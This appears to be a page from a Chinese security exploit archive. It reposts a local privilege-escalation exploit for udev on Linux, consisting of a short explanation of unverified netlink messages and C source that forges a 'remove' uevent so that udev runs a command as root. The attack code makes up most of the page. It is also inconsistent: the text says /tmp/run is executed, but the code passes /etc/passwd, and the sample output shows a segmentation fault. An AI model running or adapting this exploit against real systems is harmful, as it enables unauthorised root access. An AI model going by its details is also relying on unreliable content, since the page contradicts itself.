首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation
来源:wassline@gmail.com 作者:Asrir 发布时间:2017-04-18  
/*
# Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# The full Research: https://www.facebook.com/asrirnassim/
# CVE: CVE-2017-7874
 
# Exp #
 
first of all we need to know a small infos about udev and how it work
 
the udev deamon is responsible for receiving device events from the kernel
 
and this event are delivered to udev via netlink (is a socket family)
 
you can read more about udev from: https://en.wikipedia.org/wiki/Udev
 
# Exploit #
 
The udev vulnerability resulted from a lack of verification of the netlink message source in udevd.
 
read lines from: /lib/udev/rules.d/50-udev-default.rules
 
all we need is this action: ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"   
 
this action allows execution of arbitrary commands.
 
in our exploit we specifying a malicious REMOVE_CMD and causes the privileged execution of attacker-controlled /tmp/run file.
 
Get your udev version:
 
Execute: $ udevadm --version
 
//output: 232
 
Maybe < 232 also is vulnerable
*/
 
 
 
// gcc rootme.c -o rootme
// ./rootme
// segmantation fault
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
 
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
 
int
main(int argc, char **argv)
{
  int sock;
  char *mp;
  char message[4096];
  struct msghdr msg;
  struct iovec iovector;
  struct sockaddr_nl address;
 
  memset(&address, 0, sizeof(address));
  address.nl_family = AF_NETLINK;
  address.nl_pid = atoi(argv[1]);
  address.nl_groups = 0;
 
  msg.msg_name = (void*)&address;
  msg.msg_namelen = sizeof(address);
  msg.msg_iov = &iovector;
  msg.msg_iovlen = 1;
 
  sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
  bind(sock, (struct sockaddr *) &address, sizeof(address));
 
  mp = message;
  mp += sprintf(mp, "a@/d") + 1;
  mp += sprintf(mp, "SUBSYSTEM=block") + 1;
  mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
  mp += sprintf(mp, "TIMEOUT=10") + 1;
  mp += sprintf(mp, "ACTION=remove") +1;
  mp += sprintf(mp, "REMOVE_CMD=/etc/passwd") +1;
 
  iovector.iov_base = (void*)message;
  iovector.iov_len = (int)(mp-message);
 
  sendmsg(sock, &msg, 0);
 
  close(sock);
 
  return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Huawei HG532n Command Injectio
·VirusChaser 8.0 - Buffer Overf
·Alienvault OSSIM/USM 5.3.4/5.3
·WinSCP 5.9.4 - 'LIST' Denial o
·Microsoft Windows Kernel - 'wi
·Mantis Bug Tracker 1.3.0/2.3.0
·PonyOS 4.0 - 'fluttershy' LD_L
·Microsoft Windows - Uncredenti
·GNS3 Mac OS-X 1.5.2 - 'ubridge
·Tenable Appliance < 4.5 - Unau
·Cisco Catalyst 2960 IOS 12.2(5
·pinfo 0.6.9 - Local Buffer Ove
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved